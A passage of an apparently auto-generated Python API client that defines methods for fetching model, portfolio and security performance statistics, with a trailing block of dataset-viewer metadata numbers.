(data) = self.get_model_performance_using_get_with_http_info(model_id, **kwargs) # noqa: E501
return data
def get_model_performance_using_get_with_http_info(self, model_id, **kwargs): # noqa: E501
"""Model Performance # noqa: E501
Get information on the performance of a model using TWR (Time Weighted Return). You must provide the unique model_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_performance_using_get_with_http_info(model_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str model_id: Model Id - /model (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Tenant Benchmark Id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: Stat Type
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['model_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'model_id' is set
if ('model_id' not in params or
params['model_id'] is None):
raise ValueError("Missing the required parameter `model_id` when calling `get_model_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'model_id' in params:
path_params['model_id'] = params['model_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/model/{model_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_portfolio_performance_using_get(self, account_id, client_id, portfolio_id, portfolioid, **kwargs): # noqa: E501
"""Portfolio Performance # noqa: E501
Get information on the performance of a portfolio using IRR (Internal Rate of Return). You must provide the unique portfolio_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_performance_using_get(account_id, client_id, portfolio_id, portfolioid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id -/account (required)
:param str client_id: Client Id -/client (required)
:param str portfolio_id: portfolio_id (required)
:param str portfolioid: Portfolio Id -/portoflio (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Benchmark Id - benchmarkId or clientBenchmarkId -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type - /statistics endpoint to get types
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_portfolio_performance_using_get_with_http_info(account_id, client_id, portfolio_id, portfolioid, **kwargs) # noqa: E501
else:
(data) = self.get_portfolio_performance_using_get_with_http_info(account_id, client_id, portfolio_id, portfolioid, **kwargs) # noqa: E501
return data
def get_portfolio_performance_using_get_with_http_info(self, account_id, client_id, portfolio_id, portfolioid, **kwargs): # noqa: E501
"""Portfolio Performance # noqa: E501
Get information on the performance of a portfolio using IRR (Internal Rate of Return). You must provide the unique portfolio_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_performance_using_get_with_http_info(account_id, client_id, portfolio_id, portfolioid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id -/account (required)
:param str client_id: Client Id -/client (required)
:param str portfolio_id: portfolio_id (required)
:param str portfolioid: Portfolio Id -/portoflio (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Benchmark Id - benchmarkId or clientBenchmarkId -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type - /statistics endpoint to get types
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'client_id', 'portfolio_id', 'portfolioid', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_portfolio_performance_using_get`") # noqa: E501
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `get_portfolio_performance_using_get`") # noqa: E501
# verify the required parameter 'portfolio_id' is set
if ('portfolio_id' not in params or
params['portfolio_id'] is None):
raise ValueError("Missing the required parameter `portfolio_id` when calling `get_portfolio_performance_using_get`") # noqa: E501
# verify the required parameter 'portfolioid' is set
if ('portfolioid' not in params or
params['portfolioid'] is None):
raise ValueError("Missing the required parameter `portfolioid` when calling `get_portfolio_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
if 'client_id' in params:
path_params['client_id'] = params['client_id'] # noqa: E501
if 'portfolio_id' in params:
path_params['portfolio_id'] = params['portfolio_id'] # noqa: E501
if 'portfolioid' in params:
path_params['portfolioid'] = params['portfolioid'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/portfolio/{portfolio_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_security_performance_using_get(self, security_id, **kwargs): # noqa: E501
"""Security Performance # noqa: E501
Get performance statistics for a security using TWR (Time Weighted Return). You must provide the unique security_id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_security_performance_using_get(security_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str security_id: security_id (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str bench_ticker: Bench Ticker for security - (default: ^GSPC)
:param str benchmark_id: benchmark_id
:param date end_date: Ending parameter for time window
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: Starting parameter for time window
:param str stat: A stat type - /statistics endpoint
:param str ticker: Ticker for security
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_security_performance_using_get_with_http_info(security_id, **kwargs) # noqa: E501
else:
(data) = self.get_security_performance_using_get_with_http_info(security_id, **kwargs) # noqa: E501
return data
def get_security_performance_using_get_with_http_info(self, security_id, **kwargs): # noqa: E501
"""Security Performance # noqa: E501
Get performance statistics for a security using TWR (Time Weighted Return). You must provide the unique security_id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_security_performance_using_get_with_http_info(security_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str security_id: security_id (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str bench_ticker: Bench Ticker for security - (default: ^GSPC)
:param str benchmark_id: benchmark_id
:param date end_date: Ending parameter for time window
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: Starting parameter for time window
:param str stat: A stat type - /statistics endpoint
:param str ticker: Ticker for security
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['security_id', 'active_premium_period', 'annualized_return_period', 'bench_ticker', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'ticker', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_security_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'security_id' is set
if ('security_id' not in params or
params['security_id'] is None):
raise ValueError("Missing the required parameter `security_id` when calling `get_security_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'security_id' in params:
path_params['security_id'] = params['security_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'bench_ticker' in params:
query_params.append(('benchTicker', params['bench_ticker'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'ticker' in params:
query_params.append(('ticker', params['ticker'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/security/{security_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 66.112096
| 582
| 0.668688
| 13,808
| 104,391
| 4.790267
| 0.020206
| 0.037373
| 0.050375
| 0.054003
| 0.980467
| 0.974072
| 0.967964
| 0.963806
| 0.957744
| 0.950593
| 0
| 0.025494
| 0.23046
| 104,391
| 1,578
| 583
| 66.153992
| 0.797879
| 0.47984
| 0
| 0.850183
| 1
| 0
| 0.349753
| 0.141517
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020706
| false
| 0
| 0.004872
| 0
| 0.056029
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.